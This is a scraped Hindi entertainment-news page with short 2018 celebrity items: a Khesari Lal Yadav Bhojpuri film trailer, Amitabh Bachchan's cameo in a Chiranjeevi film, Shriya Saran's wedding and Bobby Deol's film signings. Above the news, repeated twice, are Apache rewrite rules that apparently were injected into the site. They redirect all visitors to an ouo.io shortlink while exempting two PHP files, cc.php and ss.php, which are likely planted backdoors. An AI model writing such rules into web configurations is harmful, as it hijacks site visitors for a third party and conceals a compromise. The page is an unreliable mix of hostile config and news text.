
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
मुंबई। भोजपुरी फिल्म ‘दुलहिन गंगा पार के’ के ट्रेलर ने इन दिनों यूट्यूब पर जबर्दस्त धमाल मचा रखा है। यह फिल्म खूब सारे गानों से सजी है। फिल्म में एक्शन से लेकर गानों में खेसारी लाल यादव छाए हुए हैं। ‘दुलहिन गंगा पार के’सॉन्ग ट्रेलर के नाम से यू-ट्यूब पर यह वीडियो शेयर किया गया है। इस वीडियो में फिल्म के लगभग सारे गानों के मुखड़े दिखाए गए हैं। महज दो दिन में इस फिल्म के सॉन्ग ट्रेलर को अब तक 13 लाख लोग देख चुके हैं। इस वीडियो में कुछ गाने काफी पॉपुलर हो रहे हैं। ‘मर्द हमारा बच्चा बा’ और ‘जवानी लेके उड़ जाई कउवा’ ये गानें भोजपुरी फिल्म के दर्शक काफी पसंद कर रहे हैं। कुछ वक्त पहले ही इस फिल्म का ट्रेलर जारी किया गया था। मुंबई में एक कार्यक्रम के दौरान फिल्म के ट्रेलर को जारी किया गया। इस दौरान फिल्म के स्टार खेसारीलाल की बेटी कृति भी इस इवेंट पर मौजूद रहीं। दरअसल, खेसारी लाल की बेटी भी इस फिल्म में एक्टिंग करती हुई दिखाई देंगी। फिल्म के ट्रेलर में यादव की 8 साल की बेटी कृति काफी क्यूट लग रही हैं। इस फिल्म में खेसारीलाल यादव के अपोजिट काजल राघवानी पर्दे पर नजर आने वाली हैं। इस फिल्म की रिलीज डेट फिलहाल सामने नहीं आई है। जल्द ही फिल्म कब रिलीज होगी इस बारे में जानकारी सार्वजनिक की जाएगी।
05 Apr, 2018
आगे पढ़ऐमुंबई। लम्बे अरसे से दक्षिण के मेगास्टार चिरंजीवी की ख्वाहिश थी कि वह कभी बॉलीवुड के महानायक अमिताभ बच्चन के साथ काम कर सकें। अब उनकी यह तमन्ना पूरी होने जा रही है। अमिताभ उनकी आने वाली फिल्म में मेहमान कलाकार के बतौर नज़र आएँगे। चिरंजीवी की आगामी पीरियड ड्रामा फिल्म ‘से रा नरसिम्हा रेड्डी’ से अमिताभ का पहला लुक भी सामने आ गया है। बच्चन ने चिरु की इस फिल्म में अपने लुक की जानकारी अपने ब्लॉग के माध्यम से भी दी है। उन्होंने लिखा है कि वह दोस्त चिरंजीवी की तेलुगु फिल्म में केमियो कर रहे हैं। यह पुराने समय का एक महत्वपूर्ण किरदार है, जिसे निभाने के लिए बच्चन राज़ी हुए हैं। अपने एक फोटो को शेयर करते हुए बच्चन ने लिखा है कि यह उनका फाइनल लुक नहीं है लेकिन काफी करीब है। दक्षिण के जाने माने स्वाधीनता सेनानी उयाल्लवाडा नरसिम्हा रेड्डी के जीवन पर बन रही इस फिल्म में दक्षिण के सुपरस्टारों राम चरण, सुरेन्द्र रेड्डी, विजय सत्पथी, जगपति बाबू और नयनतारा की मुख्य भूमिकाएं हैं।
31 Mar, 2018
आगे पढ़ऐ'दृश्यम' में अजय देवगन की वाइफ का रोल प्ले करने वालीं एक्ट्रेस श्रिया सरन (35) ने 19 मार्च को उदयपुर के एक होटल में गुपचुप शादी कर ली। इस शादी की फोटोज और वीडियोज तेजी से सोशल मीडिया पर वायरल होने लगे थे। और अब दोनों की सगाई का एक फोटो वायरल हो रहा है, जिसमें श्रिया सबके सामने अपने ब्वॉयफ्रेंड-हसबैंड (आंद्रेई कोशेचेव) को किस करती हुई नजर आ रही हैं। इस फोटो में साफ नजर आ रहा है कि श्रिया और आंद्रेई कैसे एक-दूसरे के प्यार में डूबे हुए हैं। ये एक रोमांटिक फोटो है जिसमें न्यूली वेड्स कपल लिपलॉक करता नजर आ रहा है। बता दें कि श्रिया के हसबैंड आंद्रेई कोशेचेव नेशनल लेवल के टेनिस प्लेयर हैं। दोनों की शादी उदयपुर में ट्रेडिशनल हिंदू रीति-रिवाज से हुई है। शादी का सबसे खास पल वो था जब श्रिया के रशियन दूल्हे ने स्टेज पर शाहरुख खान की फेमस फिल्म मोहब्बतें का रोमांटिक डायलॉग बोला। हालांकि, उनकी भाषा टूटी-फूटी थी। लेकिन श्रिया के लिए उनका प्यार साफ जाहिर हो रहा था।
24 Mar, 2018
आगे पढ़ऐकरिश्मा कपूर का उनके एक्स हसबैंड संजय कपूर से तलाक काफी विवादों में रहा था। लेकिन लगता है दोनों अब पुरानी बातों को भूल चुके हैं और अपने खराब रिश्तों का असर बच्चों पर नहीं पड़ने देना चाहते। संजय कपूर इन दिनों अपने दोनों बच्चों के साथ क्वॉलिटी टाइम बिता रहे हैं। जिसकी जानकारी उन्होंने अपने ट्विटर अकाउंट पर दी है। बच्चों के साथ हॉलिडे की तस्वीर शेयर करते हुए संजय कपूर ने लिखा- बच्चों के साथ स्कीइंग करते हुए वीकेंड बिताया। समय के साथ-साथ उनके एक्सपीरिंयस के काफी कुछ सीखने को मिल रहा है। उनके साथ बिताया हर पल कीमती है। शानदार बातचीत, आउटस्टैंडिंग स्कीइंग और अच्छा क्वॉलिटी टाइम बिताया। संजय कपूर के साथ बच्चों की ये तस्वीर करिश्मा ने अपने इंस्टा स्टोरी पर शेयर की थी। हालांकि इस दौरान करिश्मा उनके साथ थीं या नहीं ये अभी साफ नहीं हो पाया है। हाल ही में करिश्मा और संजय ने अपनी बेटी के बर्थ डे पर मुंबई में शानदार पार्टी रखी थी. इस पार्टी में कई सेलेब्स और कपूर परिवार के सदस्य पहुंचे थे। मीडिया रिपोर्ट्स के मुताबिक, एक्स हसबैंड संजय कपूर के अलावा इस पार्टी में करिश्मा के बॉयफ्रेंड संदीप तोषनीवाल भी शामिल हुए थे। हालांकि संजय और संदीप ने पार्टी में एक-दूसरे से कोई बात नहीं की। करिश्मा कपूर और संजय कपूर रिश्तों में कड़वाहट आने के बाद भले ही एक दूसरे से अलग हो चुके हों। लेकिन अपने बच्चों समायरा और कियान की खुशी का पूरा ख्याल रखते हैं। दोनों ने साल 2016 में तलाक ले लिया था।
24 Mar, 2018
आगे पढ़ऐमुंबई। ऋतिक रोशन का नाम ऐसा हो गया है कि बिना इनके कंगना की कंट्रोवर्सी के चर्चे पूरे ही नहीं होते। साल 2017 में भी इन दोनों का किस्सा हर तरफ छाया रहा। इसकी वजह बनी फिल्म प्रमोशन के दौरान कंगना की बेबाकी। कंगना के बयानों से ऋतिक इतने आहत हो गए थे कि उन्होंने आखिर में एक लंबे-चौड़े लेटर के जरिए अपने दिल की बात रखी थी। इस सारे मामले की असल शुरुआत साल 2016 में हुई थी। कंगना और ऋतिक एक दूसरे कई तरह के आरोप लगा रहे थे लेकिन कोई नहीं जानता था कि सच क्या है? करीब 11 महीने बाद जब मुंबई पुलिस ने केस बिना किसी नतीजे के बंद कर दिया और मीडिया में खबरें आईं कि ऋतिक और कंगना इस विवाद को आपसी सहमति से सुलझाने के लिए तैयार हो गए हैं तब सबने राहत की सांस ली थी। तब ये मान लिया गया था कि ऋतिक और कंगना के बीच झगड़ा खत्म हो चुका है। लेकिन अब कंगना रनौत के एक बयान ने फिर से दोनों के बीच 11 महीनों तक चले विवाद की यादें ताजा कर दी हैं। दरअसल कंगना ने एक इंटरव्यू में बिना ऋतिक का नाम लिए कहा है कि उन्हें उनसे माफी मांगनी चाहिए। सवाल ये है कि क्या कंगना का ये बयान एक बार फिर दोनों के बीच नई लड़ाई की शुरुआत की वजह बनेगा? इस सवाल का जवाब आपको दोनों के बीच लंबे वक्त तक चले विवाद पर एक नजर डालकर मिल सकता है।
23 Mar, 2018
आगे पढ़ऐनई दिल्ली। बिग बॉस सीजन 7 की कंटेस्टेंट व एक्ट्रेस एली अवराम और इंडियन क्रिकेट टीम के ऑलराउंडर प्लेयर हार्दिक पंड्या को एक बार फिर मुलाकात करते हुए देखा गया। कथित तौर पर एक दूसरे को डेट कर रहे हार्दिक पंड्या और एली अवराम मुंबई के गोरेगांव स्थित फिल्मीस्तान स्टूडियो में मिले, जहां हार्दिक किसी विज्ञापन की शूटिंग कर रहे हैं। हालांकि दोनों ही कैमरे के सामने एक साथ नहीं आए, लेकिन उन्हें एक ही जगह पर अलग-अलग तस्वीरों में कैद कर लिया गया। कैमरामैनों से घिरीं एली ने सभी को अवाइड करते हुए अपनी कार में बैठकर स्टूडियो से निकल गईं। आपको बता दें कि पिछले साल दिसंबर में हार्दिक के बड़े भाई क्रुणाल पंड्या के रिसेप्शन में भी एली अवराम को देखा गया था, तभी से यह अफवाह उड़ी कि दोनों ही एक-दूसरे को डेट कर रहे हैं। पिछले कुछ हफ्तों में एयरपोर्ट समेत उन्हें कई बार एक साथ देखा गया, जोकि सोशल मीडिया पर काफी वायरल हो गया। हालांकि अभी तक एली या फिर हार्दिक ने आधिकारिक तौर पर इस मसले को लेकर कोई भी बयान नहीं दिया है और न ही सोशल मीडिया पर कोई भी पोस्ट की है। अगर यह अफवाह सच होती है तो विराट-अनुष्का और जहीर-सागरिका के बाद लेटेस्ट जोड़ी होगी जो बॉलीवुड और क्रिकटर्स की नई जोड़ी बनाएगी।
22 Mar, 2018
आगे पढ़ऐमुंबई। ये तो सभी जानते है कि बॉलीवुड के दबंग खान यानि की सलमान का किसी फिल्म में शर्टलेस होना यानि की उस फिल्म की सफलता की गारंटी है। सलमान खान को शर्टलेस देखने के लिए उनके फैंस पागल रहते है। आज आपको बता रहे है कि आखिर सलमान खान शर्टलेस क्यों होते है और उसके पीछे क्या कारण है। जी हां इस बात का खुलासा खुद सलमान खान ने एक इंटरव्युव में किया है। सलमान खान इन दिनों अपनी आने वाली फिल्म रेस 3 को लेकर चर्चा में है और ट्विटर पर सलमान खान रेस 3 का मोशन पोस्टर भी शेयर किया था। बता दें कि सलमान ने शर्टलेस होने की वजह बताते हुए कहा कि अगर आपके पास एक अच्छी बॉडी है तो वो आपकी ही अमानत है आप चाहे तो उसको दिखा सकते है इसमें कोई बुराई नहीं है। सलमान ने कहा कि वो घर पर ज्यादातर समय शर्टलेस रहते है और रोड पर भी निकल जाते है। सलमान का कहना है कि अगर इस बात से किसी को फर्क पड़ता है तो वो वहां से निकल जाए मुझे परवाह नही है।
21 Mar, 2018
आगे पढ़ऐमुंबई। पिछले कुछ दिनों से फिल्म मेकर करन जौहर काफी परेशान थे। उनकी परेशानी की वजह जाह्नवी और ईशान बने हुए थे। दरअसल पिछले कुछ समय से लगातार उनकी फिल्म धड़क के सेट से तस्वीरें लीक हो रही थीं। इन तस्वीरों की वजह से जाह्नवी और ईशान के लुक के साथ-साथ लोकेशन के बारे में भी खुलासे हो रहे थे। ये बात करन के लिए मुसीबत का सबब बनती जा रही थी। इस पर सोच विचार करने के बाद करन ने सेट पर नियम लागू कर दिया। करन का ये नियम काफी सख्त है। इससे सेट पर मौजूद लोगों को परेशानी तो हो रही है। लेकिन सीक्रेसी बनाए रखने के लिए ये करना जरूरी भी है। दरअसल करन ने फिल्म के सेट पर मोबाइल फोन बैन कर दिया है। अब सेट पर सभी लोग बिना फोन रहते हैं। हां आउटडोर काम होने पर लोगों को कंट्रोल करना उनके बस में नहीं है। फिल्म के डायरेक्टर शशांक खेतान का कहना है कि सेट पर तो वह पूरी सावधानी बरत रहे हैं। लेकिन बाहर के लोगों को हम कंट्रोल नहीं कर सकते। उम्मीद है कि लोग इसमें हमारे मदद करेंगे। बता दें कि श्रीदेवी के निधन के बाद करीब 13 दिन बाद जाह्नवी सेट पर लौटी हैं। उनके काम पर वापसी के दूसरे दिन से ही सेट की तस्वीरें सोशल मीडिया पर वायरल हो रही थीं।
14 Mar, 2018
आगे पढ़ऐमुंबई। कंगना रनौत एक भांजे की मौसी बन चुकी हैं। उनकी बहन रंगोली ने नवंबर महीने में बेटे को जन्म दिया था। उसका नाम उन्होंने पृथ्वी रखा। तभी से वो ट्विटर पर अपने बच्चे की तस्वीरें शेयर करती रहती हैं। लेकिन कलपहली बार ऐसा हुआ कि पृथ्वी के साथ मम्मी रंगोली नहीं मौसी कंगना के क्यूट पोज देखने को मिले। एक तस्वीर में कंगना पृथ्वी को किस करती नजर आ रही हैं। पृथ्वी भी मौसी कंगना की कंपनी में काफी खुश दिख रहा है। कंगना रनौत की बहन रंगोली ने 16 नवंबर को पृथ्वी को जन्म दिया था। उन्होंने ट्विटर पर न्यूबॉर्न बेबी बॉय पृथ्वी की तस्वीर शेयर करते हुए कुछ ही समय बाद इसकी जानकारी भी दी थी। रंगोली और कंगना एक-दूसरे के काफी करीब हैं। रितिक से विवाद होने की बात हो या किसी फिल्म की रंगोली हमेशा कंगना के साथ खड़ी नजर आती हैं। वैसे कंगना इन दिनों अपनी आने वाली फिल्म मणिकर्णिका में व्यस्त हैं। इसमें वह झांसी की रानी लक्ष्मीबाई का रोल निभा रही हैं। फिल्म की प्रोड्यूसर भी वह खुद ही हैं। इसके साथ ही उन्होंने एकता कपूर की अगली फिल्म मेंटल है क्या की शूटिंग भी शुरू कर दी है। इसमें उनके साथ राजकुमार राव मुख्य भूमिका में हैं।
14 Mar, 2018
आगे पढ़ऐमुंबई। बॉबी देओल की किस्मत चमक गई हैं। बॉलीवुड में कई सालों के बाद फिल्म रेस 3 से बॉबी देओल कमबैक कर रहे हैं,लेकिन इस साल बॉबी देओल की लगातार तीन फिल्में आ रही हैं। बॉबी रेस 3' के अलावा बॉबी 'यमला पगला दीवाना 3' की शूटिंग भी कर रहे हैं।वहीं खबरों की माने तो बॉबी के पास फिल्म 'हाउसफुल 4' भी हैं। आपकों बता दें कि खबरों की मानें तो बॉबी को साजिद नाडियाडवाला ने 'हाउसफुल 4' के लिए साइन किया है।बॉबी ने एक साथ 3 फिल्मों को साइन कर सिल्वर स्क्रीन पर हैट्रिक लगाने की सोच ली है। बॉबी ने एक साथ 3 फिल्मों को साइन कर सिल्वर स्क्रीन पर हैट्रिक लगाने की सोच ली है। 'हाउसफुल 4' में बॉबी, अक्षय कुमार और रितेश दुशमुख के साथ कॉमेडी करते नजर आएंगे। 2019 बॉबी देओल के नाम होने वाला है।'रेस 3' इसी साल दिवाली पर रिलीज होगी। बॉबी देओल ने खुद इस खबर पर मुहर लगाई है। उन्होंने कहा, 'मैं हमेशा से साजिद नाडियाडवाला के साथ काम करना चाहता था। अक्षय के साथ मेरी केमिस्ट्री बेहद अच्छी है और अब हम दोबारा बड़े पर्दे पर साथ होंगे। यह एक बड़ी फिल्म होगी।
14 Mar, 2018
आगे पढ़ऐ